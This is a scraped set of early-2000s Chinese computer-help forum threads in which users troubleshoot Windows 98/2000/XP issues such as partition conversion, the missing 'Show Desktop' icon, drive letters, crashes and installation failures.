推荐使用PARTITION MAGIC ~ 带数据的任何转换~

慎用！
我曾经用pm7.0来转换一个fat格式的盘，转成fat32后再进98就平白多出了一个盘来，大小和原来fat的那个盘一样大，里面没有任何文件，我好奇往里面拷了些文件，也能拷进去，但再重起一遍98后就进不了那原来的盘了，再打开pm看，那个盘已成了不可识别格式的

缘是天定,份在人为.
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-17 18:13:21 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
不用这么麻烦！2000可以支持2G以上的空间转成fat32！你在格式化的时候选格式是fat32就行了！格完就ok！

I am a freedog！
上一贴 | 下一贴
快速回复 主题：如何转换？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


"显示桌面"不见了 - 经 典 论 坛

计算机技术
"显示桌面"不见了

上一贴 | 下一贴
发表人 主题: "显示桌面"不见了
jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-19 17:31:55 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
win2000左下角的快速启动栏"显示桌面"不见了，请问怎么办，我找不回来了！：

誓与WIN2000共存
alphalee

初级用户
积分：62
发帖：22
来自：北京
注册：2001-12-19
 发表于 2001-12-19 18:44:29 按此观看alphalee的个人资料 按此发邮件给alphalee 访问alphalee的主页 alphalee 的 oicq 是18776996,查看 18776996 的资料 发送悄悄话给alphalee 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看alphalee的IP
右键单击“任务栏”，选择“工具栏”——“快速启动”

我的《日记本子》
http://www.diary365.net/book/choose.asp?author=liyue
青春是个普通的名称，它是幸福美好的，但它也充满着艰苦的磨炼！
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 19:03:44 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
快捷键Win D一样

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-19 20:05:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
简单！
再新建个用户，然后去信用户的目录下面把显示桌面copy过来，然后删除用户，解决！

态度决定一切

Blueidea Web Team
Team Member

赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 23:51:16 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
你就会删除用户啊

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-20 00:58:01 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
赵鹏在上个帖子中说
引用:
你就会删除用户啊

这种终极招数，你哪里懂得其中方便！

态度决定一切

Blueidea Web Team
Team Member

嘿嘿

坏笑
积分：414
发帖：559
来自：
注册：2001-10-06
 发表于 2001-12-20 10:18:14 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
用“桌面”这个关键词来搜索windows的目录，应该是可以找出来的，然后发送一个快捷方式到桌面上，再拖到快速启动栏里就行了。

缘是天定,份在人为.
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2001-12-20 13:59:27 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch

右键“显示桌面”，发送快捷方式

等我想想再签
天外飞猪

经典飞猪
积分：2196
发帖：909
来自：AnHui
注册：2001-11-16
 发表于 2001-12-20 19:18:30 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 访问天外飞猪的主页 天外飞猪 的 oicq 是131433,查看 131433 的资料 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
C:\WINDOWS\Application Data\Mi...\Quick Launch
它藏在这里呢
51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-20 19:28:08 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

把上面的文字用记事本存为(显示桌面.scf)
－－－－－－－－－－－－－－－－－－

图标文件可以从0到10
[Shell]
Command=2
IconFile=explorer.exe,1

[Taskbar]
Command=Explorer
是Explorer的代码
－－－－－－－－－－－－－
欢迎光临我的网页－windows学习http://www.51windows.com

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

上一贴 | 下一贴
快速回复 主题："显示桌面"不见了
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


谁知道WIN2000的图标文件都放在哪？？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
谁知道WIN2000的图标文件都放在哪？？

上一贴 | 下一贴
发表人 | 主题: 谁知道WIN2000的图标文件都放在哪？？
cheng 初级用户 积分：46 发帖：16 来自：辽宁锦州 注册：2001-12-20 | 发表于 2001-12-28 14:50:20 按此观看cheng的个人资料 该用户不允许显示它的电子邮件 cheng 的 oicq 是3181247,查看 3181247 的资料 收藏该主题供以后查看 发送悄悄话给cheng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cheng的IP 谁知道WIN2000的图标文件都放在哪？？ cola
2smile 活着就好 积分：1811 发帖：2105 来自：SD 注册：2001-05-13 | 发表于 2001-12-28 16:00:19 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP shell32.dll explorer.exe 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
cheng 初级用户 积分：46 发帖：16 来自：辽宁锦州 注册：2001-12-20 | 发表于 2001-12-29 15:16:44 按此观看cheng的个人资料 该用户不允许显示它的电子邮件 cheng 的 oicq 是3181247,查看 3181247 的资料 发送悄悄话给cheng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cheng的IP 那我如何才能得到它们呢？？ cola
wangfeng 超级用户 积分：330 发帖：102 来自：辽宁 注册：2001-12-23 | 发表于 2001-12-29 17:49:11 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP *.ico 我曾经问个不休？………………………………………………？
cheng 初级用户 积分：46 发帖：16 来自：辽宁锦州 注册：2001-12-20 | 发表于 2001-12-30 20:46:09 按此观看cheng的个人资料 该用户不允许显示它的电子邮件 cheng 的 oicq 是3181247,查看 3181247 的资料 发送悄悄话给cheng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cheng的IP 我说的不是ICO文件而是 比如 “我的电脑” 的图标 我如何能得到它!？？ cola
2smile 活着就好 积分：1811 发帖：2105 来自：SD 注册：2001-05-13 | 发表于 2001-12-30 21:15:53 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 用Microangelo可以打开 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
上一贴 | 下一贴
快速回复 主题：谁知道WIN2000的图标文件都放在哪？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何创建XP的启动盘！！！如何卸载XP！！！ - 经 典 论 坛

计算机技术
如何创建XP的启动盘！！！如何卸载XP！！！

上一贴 | 下一贴
发表人 | 主题: 如何创建XP的启动盘！！！如何卸载XP！！！
yixinguy78 终级用户 积分：546 发帖：194 来自：china 注册：2001-02-10 | 发表于 2001-12-29 15:06:15 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 用XP真苦！ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-01 11:54:02 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 1、microsoft 已经发布了专用的启动盘制作软件，需要6张软盘 2、卸载集format，最彻底
t1234a 初级用户 积分：79 发帖：63 来自：china-jinan 注册：2001-03-24 | 发表于 2002-01-01 19:55:12 按此观看t1234a的个人资料 按此发邮件给t1234a t1234a 的 oicq 是29040183,查看 29040183 的资料 发送悄悄话给t1234a 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看t1234a的IP 楼上的给个 地址好不好?
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-02 01:03:37 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent http://support.microsoft.com/default.aspx?scid=kb;en-us;Q310994&ID=310994
上一贴 | 下一贴
快速回复 主题：如何创建XP的启动盘！！！如何卸载XP！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


怎样在win2k下更改硬盘的盘符？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
怎样在win2k下更改硬盘的盘符？

上一贴 | 下一贴
发表人 主题: 怎样在win2k下更改硬盘的盘符？
crystal

水晶
积分：3046
发帖：3131
来自：QUAKE
注册：2000-01-30
 发表于 2002-01-03 15:48:08 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 收藏该主题供以后查看 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
我的光驱盘符在一个硬盘盘符的前面，该死！

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke

看看还有错误没 :p
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-01-03 16:32:26 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
控制面板——管理工具——计算机管理——存储——磁盘管理，打开后
右键单击光盘——更改（盘符选择靠后一些，比如直接Z：），再右键你的那个靠后的硬盘，更改盘符为原来的光盘，之后再将光盘改成你需要的驱动器
OK

等我想想再签
crystal

水晶
积分：3046
发帖：3131
来自：QUAKE
注册：2000-01-30
 发表于 2002-01-03 17:04:51 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
我重新分区了

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke

看看还有错误没 :p
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-01-03 17:20:36 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
扑通

等我想想再签
上一贴 | 下一贴
快速回复 主题：怎样在win2k下更改硬盘的盘符？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


死机！！！！ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
死机！！！！

上一贴 | 下一贴
发表人 主题: 死机！！！！
织梦girl

初级用户
积分：6
发帖：4
来自：
注册：2001-03-13
 发表于 2002-01-04 08:55:33 按此观看织梦girl的个人资料 按此发邮件给织梦girl 织梦girl 的 oicq 是6636122,查看 6636122 的资料 收藏该主题供以后查看 发送悄悄话给织梦girl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看织梦girl的IP
为什么我的机子老死机，总是在win98启动完后，鼠标就不能动了，下次安全模式后，进入就变成16色了。系统重装后还是老样子！

学无止尽
AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2002-01-04 09:25:58 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
我的天，你说的也实在太不详细了，可能导致你所说的现象的原因有无数种，可能是硬件冲突，系统文件损坏，软件配置冲突等等原因造成。所以，请你先讲你的症状详细说明，比如机器的配置，最近安装的程序等等。

打雷了！下雨了！大家快回家收衣服啊……
织梦girl

初级用户
积分：6
发帖：4
来自：
注册：2001-03-13
 发表于 2002-01-04 17:27:57 按此观看织梦girl的个人资料 按此发邮件给织梦girl 织梦girl 的 oicq 是6636122,查看 6636122 的资料 发送悄悄话给织梦girl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看织梦girl的IP
我的机器以前都没有出错过，应该不是配置问题吧，软件配置我想我都重装了，会有问题吗？显卡接触不良会死机吗？

学无止尽
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-01-04 17:44:37 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
我以前用过一台类似的机子，装过无数遍系统都无法解决

最后——换了块主板（原因：主板不稳定）

等我想想再签
织梦girl

初级用户
积分：6
发帖：4
来自：
注册：2001-03-13
 发表于 2002-01-09 17:01:49 按此观看织梦girl的个人资料 按此发邮件给织梦girl 织梦girl 的 oicq 是6636122,查看 6636122 的资料 发送悄悄话给织梦girl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看织梦girl的IP
我要换一块主板的话，有谁能帮我提个建议吗，我是赛扬366的cpu（嘻，烂呀），应该买什么样的主板呢，谢谢各位

学无止尽
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-01-09 17:12:34 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
织梦girl在上个帖子中说
引用:
我要换一块主板的话，有谁能帮我提个建议吗，我是赛扬366的cpu（嘻，烂呀），应该买什么样的主板呢，谢谢各位

为366换主板？
不如新买一台划算！

等我想想再签
HW

初级用户
积分：0
发帖：4
来自：
注册：2001-10-09
 发表于 2002-01-09 18:02:50 按此观看HW的个人资料 按此发邮件给HW 发送悄悄话给HW 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看HW的IP
你的机器CPU可能有转换卡,换一个试试.
一定要.
西门吹牛

终级用户
积分：692
发帖：283
来自：杭州
注册：2000-09-29
 发表于 2002-01-10 08:39:10 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP
问题太多，也不一定是主板的，建议用替换法检查问题。

我将一直寻找下去......
AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2002-01-10 13:32:00 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP

换机器是最后一步做的事情，如果机器还有一点油水，我们就不能放过！（我的老奔腾现在还在发挥余热呢）

死机的问题很复杂，1000台机器可能有2000个死机的理由！所以首先要解决的是自己机器上硬件时候存在故障。最好的方法就是楼上说的替换法，如果没有那么多配件，拿到电脑城去试试。注意板卡的接触，电源的供电等等细节问题。一般最容易造成死机的部件是内存，主板等。

如果可以排除硬件损坏带来的影响，下一步就是系统的设置和软件的安装了。
首先需要对于BIOS里的重要参数进行调整，如果不清楚，看看主板说明书，或者搜索一下，有很多这方面的文章。系统安装时建议要把硬盘里的数据全部清理干净（因为有的病毒就是驻留在硬盘分区表里的，简单的格式化不能清除干净），重新分区格式化。安装要小心（这就不多说了，你可能装了上千遍了），安装完成后需要对硬件驱动，建议下载最新的驱动程序。安装驱动的时候很容易出问题，比如声卡最难安装，有时候需要反复尝试。还有就是主板的驱动也很重要，比如VIA芯片的主板如果不安装4 in 1驱动，就可能不能正常关机。
另外就是早期版本WINDOWS也有很多补丁需要打，所以安装的时候就选择较新的版本，如WINDOWS98SE，2000专业版或者直接XP（XP对于硬件的驱动很全，我的一个老显卡居然被系统直接识别病安装了驱动，这在98或者2000里是做不到的）。

说了这么多，不知道对你有没有帮助，当然你还可能遇见更复杂的问题，慢慢说吧。

打雷了！下雨了！大家快回家收衣服啊……
织梦girl

初级用户
积分：6
发帖：4
来自：
注册：2001-03-13
 发表于 2002-01-10 14:34:50 按此观看织梦girl的个人资料 按此发邮件给织梦girl 织梦girl 的 oicq 是6636122,查看 6636122 的资料 发送悄悄话给织梦girl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看织梦girl的IP
谢谢楼上的各位，我这就去试试看

学无止尽
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-10 15:30:02 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
插拔法喽，估计是显卡作怪~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 主题：死机！！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


我的xp登陆框变成了win2000的风格 - 经 典 论 坛

计算机技术
我的xp登陆框变成了win2000的风格

上一贴 | 下一贴
发表人 主题: 我的xp登陆框变成了win2000的风格
wangq

硅基帝国中尉
积分：1716
发帖：1004
来自：硅基帝国
注册：2000-11-18
 发表于 2002-01-07 16:31:21 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 收藏该主题供以后查看 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP
怎么改会xp的风格呢 谢谢

2002.5.27flashwebsite

#@%$#^@%&^#%

2001.5.27
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-07 16:45:17 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
wangq在上个帖子中说
引用:
怎么改会xp的风格呢 谢谢

桌面空白处----〉右健-----〉属性-----〉外观-----〉winxp风格~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-01-07 17:54:02 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
据说是个小BUG，改不回去的

不过如果你在局域网里，有域的话，好像只能用2000风格

等我想想再签
wangq

硅基帝国中尉
积分：1716
发帖：1004
来自：硅基帝国
注册：2000-11-18
 发表于 2002-01-07 18:10:12 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP
我就是登录为域用户后被改成win2000风格的 ：（

衰 看样子是改不回去了

2002.5.27flashwebsite

#@%$#^@%&^#%

2001.5.27
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-07 18:48:52 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
下载个 Logon XP ,选择 "Rest LogonUI To Default..." 试试.

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

上一贴 | 下一贴
快速回复 主题：我的xp登陆框变成了win2000的风格
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


win2K的安装问题~~~ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
win2K的安装问题~~~

上一贴 | 下一贴
发表人 主题: win2K的安装问题~~~
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-04 15:05:18 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 收藏该主题供以后查看 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
家里的电脑，原来的Win98想删掉装Win2K，是用win2K安装盘直接删除原来的分区，重新创建新的分区，是Maxtor 30GB的硬盘，分了3个10GB的区，用NTFS格式化C:\，安装Win2K，安装过程很顺利，设置过程也没问题，可是启动时到“Windows 2000 Professional，基于NT技术构建”的启动画面，状态条100%后就跳黑屏，光标都没了！！！热启动不了，只能强行关机。可以进安全模式，但是速度巨慢，而且设备管理器里看设备属性也巨慢，简直像死机一样。我装过N次Win2K了，这是头一回碰到~~~
机器的配置：PIII650E/联想Intel 815E主板/128X3 SDRAM/Maxtor金钻二代30GB/Intel i740显卡/SB 128声卡/联想D-Link DFE-530TX网卡/4D+双飞燕鼠标/LogicTech键盘/ RICOH CD-RW/NEC 1.44MB floppy disk...
帮忙看看吧~~~拆来拆去，装上装下，我都快累死了~~~

[这消息被POPOEVER编辑过(编辑时间2002-01-04 15:05:23)]
[这消息被POPOEVER编辑过(编辑时间2002-01-04 15:06:01)]

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

嘿嘿

坏笑
积分：414
发帖：559
来自：
注册：2001-10-06
 发表于 2002-01-04 15:17:30 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
是用光盘装的还是在硬盘上装的，如果是用光盘装的，换张光盘，如果是在硬盘上的，重新拷一遍再装，可能是安装文件坏了，有些东西没装上去。

缘是天定,份在人为.
張無忌

高级用户
积分：263
发帖：147
来自：
注册：2001-04-24
 发表于 2002-01-04 15:21:29 按此观看張無忌的个人资料 按此发邮件给張無忌 访问張無忌的主页 張無忌 的 oicq 是1236541,查看 1236541 的资料 发送悄悄话给張無忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看張無忌的IP
我也遇过一次类似的情况，那是我插上了两根256m的内存，以为这次可以牛比一下了，谁知道安装还不错，就是死活进不了win2k,最后我拔掉了一根内存，终于让我的windows重见天日！

我觉得win2k对硬件要求很严格，你的内存太多，很可能这里有问题。

學生時代
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-01-04 15:38:47 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
to:嘿嘿，光盘装的，根本不是光盘问题，这张光盘我装了N台机器了~~~
to:無忌，我也想到过的，拆掉一根试过，也不行。另外，我在公司的机子上就用了2根256MB的内存，一点问题也没有~~~

[这消息被POPOEVER编辑过(编辑时间2002-01-04 15:41:34)]

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

阿嘉

高级用户
积分：250
发帖：78
来自：四川
注册：2001-02-26
